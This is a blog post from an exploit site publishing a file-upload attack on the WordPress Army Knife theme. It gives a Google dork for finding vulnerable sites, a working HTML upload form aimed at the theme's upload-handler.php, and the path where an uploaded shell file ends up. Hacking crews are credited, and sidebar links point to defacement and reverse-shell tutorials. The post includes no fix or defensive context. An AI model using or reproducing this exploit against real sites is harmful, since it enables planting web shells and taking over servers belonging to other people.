• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Army Knife CSRF File Upload Vulnerability

November 9, 2013 by Jack Wilder Leave a Comment

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux

Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Filed Under: WordPress Exploit Tagged With: Exploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

DNS Hijacking through Social Engineering

Reverse Shell From Local File Inclusion Exploit

Hack Targeted Website using Reverse IP

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

FCKeditor Bypass Shell Upload With Burp Suite Intercept

Exploit WPStore Themes Upload Vulnerability

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

LinuxSec / 12 queries in 0.09 seconds